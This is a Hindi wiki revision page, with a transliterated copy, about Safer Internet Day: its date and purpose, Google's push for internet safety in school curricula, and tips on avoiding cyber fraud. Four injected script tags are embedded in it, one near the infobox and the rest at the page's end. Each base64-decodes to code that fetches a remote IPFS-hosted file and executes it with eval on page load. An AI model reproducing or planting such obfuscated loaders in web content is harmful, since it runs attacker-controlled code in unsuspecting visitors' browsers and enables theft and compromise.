Difference between revisions of "सुरक्षित इंटरनेट दिवस"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
 
(2 intermediate revisions by 2 users not shown)
Line 4: Line 4:
 
|विवरण=सुरक्षित इंटरनेट दिवस के मौके पर रेडियो के माध्यम से लोगों को एटीएम व डेबिट कार्ड से जुड़ी ऑनलाइन ठगी से बचने के बारे में जागरूक किया जाता है
 
|विवरण=सुरक्षित इंटरनेट दिवस के मौके पर रेडियो के माध्यम से लोगों को एटीएम व डेबिट कार्ड से जुड़ी ऑनलाइन ठगी से बचने के बारे में जागरूक किया जाता है
 
|शीर्षक 1=तिथि
 
|शीर्षक 1=तिथि
|पाठ 1=[[फ़रवरी]] महीने के दूसरे हफ्ते के दूसरे दिन मनाया जाता है।
+
|पाठ 1=[[फ़रवरी]] महीने के दूसरे हफ्ते के दूसरे दिन।
 
|शीर्षक 2=उद्देश्य
 
|शीर्षक 2=उद्देश्य
 
|पाठ 2=लोगों को विशेष रूप से बच्चों और युवा लोगों को ऑनलाइन और मोबाइल फ़ोन के सुरक्षित व अधिक जिम्मेदार उपयोग के लिए प्रोत्साहित करना।  
 
|पाठ 2=लोगों को विशेष रूप से बच्चों और युवा लोगों को ऑनलाइन और मोबाइल फ़ोन के सुरक्षित व अधिक जिम्मेदार उपयोग के लिए प्रोत्साहित करना।  
Line 26: Line 26:
 
|अन्य जानकारी=तकनीकी क्षेत्र की दिग्गज कंपनी [[गूगल]] का कहना है कि वह स्कूली पाठ्यक्रमों में इंटरनेट सुरक्षा को शामिल कराने के लिए चार-पांच राज्यों के साथ बातचीत कर रही है।  
 
|अन्य जानकारी=तकनीकी क्षेत्र की दिग्गज कंपनी [[गूगल]] का कहना है कि वह स्कूली पाठ्यक्रमों में इंटरनेट सुरक्षा को शामिल कराने के लिए चार-पांच राज्यों के साथ बातचीत कर रही है।  
 
|बाहरी कड़ियाँ=
 
|बाहरी कड़ियाँ=
|अद्यतन={{अद्यतन|17:26, 6 फ़रवरी 2018 (IST)}}
+
|अद्यतन={{अद्यतन|11:39, 7 फ़रवरी 2024 (IST)}}
 
}}
 
}}
'''सुरक्षित इंटरनेट दिवस''' ([[अंग्रेज़ी]]:''Safer Internet Day'') [[फ़रवरी]] के दूसरे हफ्ते के दूसरे दिन मनाया जाता है। वर्ष 2018 में यह दिवस 6 फ़रवरी को मनाया गया। अंतर्राष्ट्रीय सुरक्षित इंटरनेट दिवस मनाने के पीछे प्रमुख मकसद लोगों को विशेष रूप से बच्चों और युवा लोगों को ऑनलाइन और मोबाइल फ़ोन के सुरक्षित व अधिक जिम्मेदार उपयोग के लिए प्रोत्साहित करना है। अंतर्राष्ट्रीय सुरक्षित इंटरनेट दिवस के मौके पर रेडियो के माध्यम से लोगों को एटीएम व डेबिट कार्ड से जुड़ी ऑनलाइन ठगी से बचने के बारे में जागरूक किया जाता है। इस दिन पोस्टर व पंपलेट के जरिये भी लोगों को जागरूक किया जाता है। साइबर क्राइम सेल द्वारा इस दिन विशेष कार्यक्रम आयोजित कर बच्चों और युवा लोगों को इंटरनेट पर काम करने के दौरान बरती जाने वाली सावधानियों के बारे में बताया जाता है।<ref>{{cite web |url=http://hindi2notes.blogspot.in/2016/11/antarrashtriya-surakshit-internet-diwas.html |title=ANTARRASHTRIYA SURAKSHIT INTERNET DIWAS in Hindi | Essay  |accessmonthday=6 फ़रवरी|accessyear=2018 |last= |first= |authorlink= |format= |publisher=हिन्दी 2 नोट्स|language=हिंदी }}</ref>  
+
'''सुरक्षित इंटरनेट दिवस''' ([[अंग्रेज़ी]]:''Safer Internet Day'') प्रत्येक वर्ष [[फ़रवरी]] माह के दूसरे हफ्ते के दूसरे दिन मनाया जाता है। वर्ष [[2024]] में यह दिवस [[5 फ़रवरी]] ([[सोमवार]]) को मनाया जायेगा। इस साल इस दिवस की थीम '''एक साथ बेहतर इंटरनेट के लिए''' है। इसका उद्देश्य सभी लोगों को मिलकर इंटरनेट को सुरक्षित बनाना है। अंतर्राष्ट्रीय सुरक्षित इंटरनेट दिवस मनाने के पीछे प्रमुख मकसद लोगों को विशेष रूप से बच्चों और युवा लोगों को ऑनलाइन और मोबाइल फ़ोन के सुरक्षित व अधिक जिम्मेदार उपयोग के लिए प्रोत्साहित करना है। अंतर्राष्ट्रीय सुरक्षित इंटरनेट दिवस के मौके पर रेडियो के माध्यम से लोगों को एटीएम व डेबिट कार्ड से जुड़ी ऑनलाइन ठगी से बचने के बारे में जागरूक किया जाता है। इस दिन पोस्टर व पंपलेट के जरिये भी लोगों को जागरूक किया जाता है। साइबर क्राइम सेल द्वारा इस दिन विशेष कार्यक्रम आयोजित कर बच्चों और युवा लोगों को इंटरनेट पर काम करने के दौरान बरती जाने वाली सावधानियों के बारे में बताया जाता है।<ref>{{cite web |url=http://hindi2notes.blogspot.in/2016/11/antarrashtriya-surakshit-internet-diwas.html |title=ANTARRASHTRIYA SURAKSHIT INTERNET DIWAS in Hindi | Essay  |accessmonthday=6 फ़रवरी|accessyear=2018 |last= |first= |authorlink= |format= |publisher=हिन्दी 2 नोट्स|language=हिंदी }}</ref>  
 
==उद्देश्य==
 
==उद्देश्य==
 
यूनाइटेड किंगडम के स्कूलों में सुरक्षित इंटरनेट एजुकेशन पैक्स और सुरक्षित इंटरनेट दिवस की एक टीवी फिल्म दिखाई जाती है ताकि उन्हें इसका महत्व पता चल सके। [[गूगल]] की डायरेक्टर सुनीता मोहंती के अनुसार हम अपने यूजर को एक सुरक्षित इंटरनेट अनुभव की पेशकश करने के लिए प्रतिबद्ध हैं। उनका कहना है कि हम हर महीने कम से कम 5 मिलियन यूजर को अपने साथ जोड़ रहे हैं। यह आँकड़ा [[भारत]] से 500 मिलियन होने की उम्मीद 2018-2019 तक है। मोहंती ने यह भी कहा की यह हमारी ज़िम्मेदारी है कि हम अपने हर एक यूजर को उनके अकाउंट में उपलब्ध डाटा और प्रोफाइल को सुरक्षित रखें।<ref>{{cite web |url=http://www.india.com/hindi-news/others/google-increased-cyber-security-on-safer-internet-day/ |title=Safer Internet Day: आज google ने यूजर को दिया बड़ा तोहफा |accessmonthday=6 फ़रवरी|accessyear=2018 |last= |first= |authorlink= |format= |publisher=इंडिया डॉट कॉम|language=हिंदी }}</ref>  
 
यूनाइटेड किंगडम के स्कूलों में सुरक्षित इंटरनेट एजुकेशन पैक्स और सुरक्षित इंटरनेट दिवस की एक टीवी फिल्म दिखाई जाती है ताकि उन्हें इसका महत्व पता चल सके। [[गूगल]] की डायरेक्टर सुनीता मोहंती के अनुसार हम अपने यूजर को एक सुरक्षित इंटरनेट अनुभव की पेशकश करने के लिए प्रतिबद्ध हैं। उनका कहना है कि हम हर महीने कम से कम 5 मिलियन यूजर को अपने साथ जोड़ रहे हैं। यह आँकड़ा [[भारत]] से 500 मिलियन होने की उम्मीद 2018-2019 तक है। मोहंती ने यह भी कहा की यह हमारी ज़िम्मेदारी है कि हम अपने हर एक यूजर को उनके अकाउंट में उपलब्ध डाटा और प्रोफाइल को सुरक्षित रखें।<ref>{{cite web |url=http://www.india.com/hindi-news/others/google-increased-cyber-security-on-safer-internet-day/ |title=Safer Internet Day: आज google ने यूजर को दिया बड़ा तोहफा |accessmonthday=6 फ़रवरी|accessyear=2018 |last= |first= |authorlink= |format= |publisher=इंडिया डॉट कॉम|language=हिंदी }}</ref>  
 
==स्कूली पाठ्यक्रम में इंटरनेट सुरक्षा==
 
==स्कूली पाठ्यक्रम में इंटरनेट सुरक्षा==
 
तकनीकी क्षेत्र की दिग्गज कंपनी [[गूगल]] का कहना है कि वह स्कूली पाठ्यक्रमों में इंटरनेट सुरक्षा को शामिल कराने के लिए चार-पांच राज्यों के साथ बातचीत कर रही है। अमेरिकी कंपनी [[गोवा]] सरकार के साथ मिलकर छात्रों को इंटरनेट पर सुरक्षित रहने के लिए शिक्षित भी कर रही है। गूगल इंडिया की निदेशक (विश्वास एवं सुरक्षा) सुनीता मोहंती ने कहा, ‘‘हम पाठ्यक्रम में इंटरनेट सुरक्षा को शामिल कराने की कोशिश कर रहे हैं। हम कई राज्य सरकारों और केंद्रीय बोडरें के साथ काम करने का प्रयास कर रहे हैं ताकि इसे रोजमर्रा की बातचीत का हिस्सा बनाया जाना सुनिश्चित किया जा सके। अभी चार-पांच राज्यों के साथ बातचीत चल रही है।’’ हालांकि उन्होंने राज्यों के नाम नहीं बताए। गोवा में 460 शिक्षकों को प्रशिक्षित किया गया है जो करीब 80,000 छात्रों तक ये जानकारी पहुंचाएंगे। छात्रों के अलावा गूगल इस संबंध में महिलाओं और ग्राहकों को भी शिक्षित करने के लिए काम कर रहा है।<ref>{{cite web |url=http://www.bgr.in/hi/news/google-wants-internet-safety-to-be-included-in-school-curriculum-in-india-tech-news-in-hindi/ |title=इंटरनेट सुरक्षा को स्कूली पाठ्यक्रम में शामिल किया जाए : गूगल |accessmonthday=6 फ़रवरी|accessyear=2018 |last= |first= |authorlink= |format= |publisher=BGR|language=हिंदी }}</ref>
 
तकनीकी क्षेत्र की दिग्गज कंपनी [[गूगल]] का कहना है कि वह स्कूली पाठ्यक्रमों में इंटरनेट सुरक्षा को शामिल कराने के लिए चार-पांच राज्यों के साथ बातचीत कर रही है। अमेरिकी कंपनी [[गोवा]] सरकार के साथ मिलकर छात्रों को इंटरनेट पर सुरक्षित रहने के लिए शिक्षित भी कर रही है। गूगल इंडिया की निदेशक (विश्वास एवं सुरक्षा) सुनीता मोहंती ने कहा, ‘‘हम पाठ्यक्रम में इंटरनेट सुरक्षा को शामिल कराने की कोशिश कर रहे हैं। हम कई राज्य सरकारों और केंद्रीय बोडरें के साथ काम करने का प्रयास कर रहे हैं ताकि इसे रोजमर्रा की बातचीत का हिस्सा बनाया जाना सुनिश्चित किया जा सके। अभी चार-पांच राज्यों के साथ बातचीत चल रही है।’’ हालांकि उन्होंने राज्यों के नाम नहीं बताए। गोवा में 460 शिक्षकों को प्रशिक्षित किया गया है जो करीब 80,000 छात्रों तक ये जानकारी पहुंचाएंगे। छात्रों के अलावा गूगल इस संबंध में महिलाओं और ग्राहकों को भी शिक्षित करने के लिए काम कर रहा है।<ref>{{cite web |url=http://www.bgr.in/hi/news/google-wants-internet-safety-to-be-included-in-school-curriculum-in-india-tech-news-in-hindi/ |title=इंटरनेट सुरक्षा को स्कूली पाठ्यक्रम में शामिल किया जाए : गूगल |accessmonthday=6 फ़रवरी|accessyear=2018 |last= |first= |authorlink= |format= |publisher=BGR|language=हिंदी }}</ref>
 
+
==बच सकते हैं साइबर फ्राॅड से==
 +
;जल्द पैसे कमाने की लालच में न फंसे
 +
कई बार पैसों की लालच या सही जानकारी से वंचित रह जाने के कारण लोग ऑनलाइन मनी फ्राड का शिकार बन जाते हैं। ऐसे में हमेशा पहले पता करें कि पैसों का लेन देन केवल अपने बैंक के प्रामाणिक ऐप पर ही हो।<ref name="pp">{{cite web |url=https://www.jagran.com/bihar/patna-city-safer-internet-day-safer-internet-day-is-being-celebrated-today-you-can-avoid-cyber-fraud-in-these-ways-23646583.html|title=सुरक्षित इंटरनेट दिवस|accessmonthday=20 फ़रवरी|accessyear=2024|last= |first= |authorlink= |format= |publisher=jagran.com |language=हिंदी}}</ref>
 +
;खतरे में डाल सकती है अनजान लिंक
 +
अनजान लिंक पर क्लिक नहीं करें और संदिग्ध वेब पेज को तुरंत ही ब्लाक कर रिपोर्ट करें।
 +
;बच्चों के ऊपर रखें निगरानी
 +
पेरेंटल कंट्रोल ऐप से बच्चों पर नज़र रखें। सेफ मोड को आन रखें, ताकि सारे वयस्क साइट बच्चों की पहुंच में न आएं।
 +
;साइबर स्टाकिंग से रहें सुरक्षित
 +
उन्हीं सुरक्षित ऐप्स का उपयोग करें जो डेटा सिक्योरिटी काउंसिल ऑफ इंडिया द्वारा अनुमोदित हैं। कई बार लोकल ऐप के जरिए धोखे से अनुमति ले ली जाती है, जिससे अपराधी लोकेशन, कांटेक्ट को ट्रैक कर स्टाकिंग का शिकार बनाते हैं।
  
 
{{लेख प्रगति|आधार=|प्रारम्भिक=प्रारम्भिक3 |माध्यमिक= |पूर्णता= |शोध= }}
 
{{लेख प्रगति|आधार=|प्रारम्भिक=प्रारम्भिक3 |माध्यमिक= |पूर्णता= |शोध= }}

Latest revision as of 06:09, 7 February 2024

surakshit iantaranet divas
vivaran surakshit iantaranet divas ke mauke par rediyo ke madhyam se logoan ko etiem v debit kard se ju di aaunalain thagi se bachane ke bare mean jagarook kiya jata hai
tithi faravari mahine ke doosare haphte ke doosare din.
uddeshy logoan ko vishesh roop se bachchoan aur yuva logoan ko aaunalain aur mobail fon ke surakshit v adhik jimmedar upayog ke lie protsahit karana.
any janakari takaniki kshetr ki diggaj kanpani googal ka kahana hai ki vah skooli pathyakramoan mean iantaranet suraksha ko shamil karane ke lie char-paanch rajyoan ke sath batachit kar rahi hai.
adyatan‎ <script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

surakshit iantaranet divas (aangrezi:Safer Internet Day) pratyek varsh faravari mah ke doosare haphte ke doosare din manaya jata hai. varsh 2024 mean yah divas 5 faravari (somavar) ko manaya jayega. is sal is divas ki thim ek sath behatar iantaranet ke lie hai. isaka uddeshy sabhi logoan ko milakar iantaranet ko surakshit banana hai. aantarrashtriy surakshit iantaranet divas manane ke pichhe pramukh makasad logoan ko vishesh roop se bachchoan aur yuva logoan ko aaunalain aur mobail fon ke surakshit v adhik jimmedar upayog ke lie protsahit karana hai. aantarrashtriy surakshit iantaranet divas ke mauke par rediyo ke madhyam se logoan ko etiem v debit kard se ju di aaunalain thagi se bachane ke bare mean jagarook kiya jata hai. is din postar v panpalet ke jariye bhi logoan ko jagarook kiya jata hai. saibar kraim sel dvara is din vishesh karyakram ayojit kar bachchoan aur yuva logoan ko iantaranet par kam karane ke dauran barati jane vali savadhaniyoan ke bare mean bataya jata hai.[1]

uddeshy

yoonaited kiangadam ke skooloan mean surakshit iantaranet ejukeshan paiks aur surakshit iantaranet divas ki ek tivi philm dikhaee jati hai taki unhean isaka mahatv pata chal sake. googal ki dayarektar sunita mohanti ke anusar ham apane yoojar ko ek surakshit iantaranet anubhav ki peshakash karane ke lie pratibaddh haian. unaka kahana hai ki ham har mahine kam se kam 5 miliyan yoojar ko apane sath jo d rahe haian. yah aank da bharat se 500 miliyan hone ki ummid 2018-2019 tak hai. mohanti ne yah bhi kaha ki yah hamari zimmedari hai ki ham apane har ek yoojar ko unake akauant mean upalabdh data aur prophail ko surakshit rakhean.[2]

skooli pathyakram mean iantaranet suraksha

takaniki kshetr ki diggaj kanpani googal ka kahana hai ki vah skooli pathyakramoan mean iantaranet suraksha ko shamil karane ke lie char-paanch rajyoan ke sath batachit kar rahi hai. ameriki kanpani gova sarakar ke sath milakar chhatroan ko iantaranet par surakshit rahane ke lie shikshit bhi kar rahi hai. googal iandiya ki nideshak (vishvas evan suraksha) sunita mohanti ne kaha, ‘‘ham pathyakram mean iantaranet suraksha ko shamil karane ki koshish kar rahe haian. ham kee rajy sarakaroan aur keandriy bodarean ke sath kam karane ka prayas kar rahe haian taki ise rojamarra ki batachit ka hissa banaya jana sunishchit kiya ja sake. abhi char-paanch rajyoan ke sath batachit chal rahi hai.’’ halaanki unhoanne rajyoan ke nam nahian batae. gova mean 460 shikshakoan ko prashikshit kiya gaya hai jo karib 80,000 chhatroan tak ye janakari pahuanchaeange. chhatroan ke alava googal is sanbandh mean mahilaoan aur grahakoan ko bhi shikshit karane ke lie kam kar raha hai.[3]

bach sakate haian saibar phraॅd se

jald paise kamane ki lalach mean n phanse

kee bar paisoan ki lalach ya sahi janakari se vanchit rah jane ke karan log aaunalain mani phrad ka shikar ban jate haian. aise mean hamesha pahale pata karean ki paisoan ka len den keval apane baiank ke pramanik aip par hi ho.[4]

khatare mean dal sakati hai anajan liank

anajan liank par klik nahian karean aur sandigdh veb pej ko turant hi blak kar riport karean.

bachchoan ke oopar rakhean nigarani

pereantal kantrol aip se bachchoan par nazar rakhean. seph mod ko an rakhean, taki sare vayask sait bachchoan ki pahuanch mean n aean.

saibar stakiang se rahean surakshit

unhian surakshit aips ka upayog karean jo deta sikyoriti kauansil aauph iandiya dvara anumodit haian. kee bar lokal aip ke jarie dhokhe se anumati le li jati hai, jisase aparadhi lokeshan, kaantekt ko traik kar stakiang ka shikar banate haian.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

tika tippani aur sandarbh

  1. ANTARRASHTRIYA SURAKSHIT INTERNET DIWAS in Hindi (hiandi) hindi 2 nots. abhigaman tithi: 6 faravari, 2018.
  2. Safer Internet Day: aj google ne yoojar ko diya b da tohapha (hiandi) iandiya d aaut k aaum. abhigaman tithi: 6 faravari, 2018.
  3. iantaranet suraksha ko skooli pathyakram mean shamil kiya jae : googal (hiandi) BGR. abhigaman tithi: 6 faravari, 2018.
  4. surakshit iantaranet divas (hiandi) jagran.com. abhigaman tithi: 20 faravari, 2024.

bahari k diyaan

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script><script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>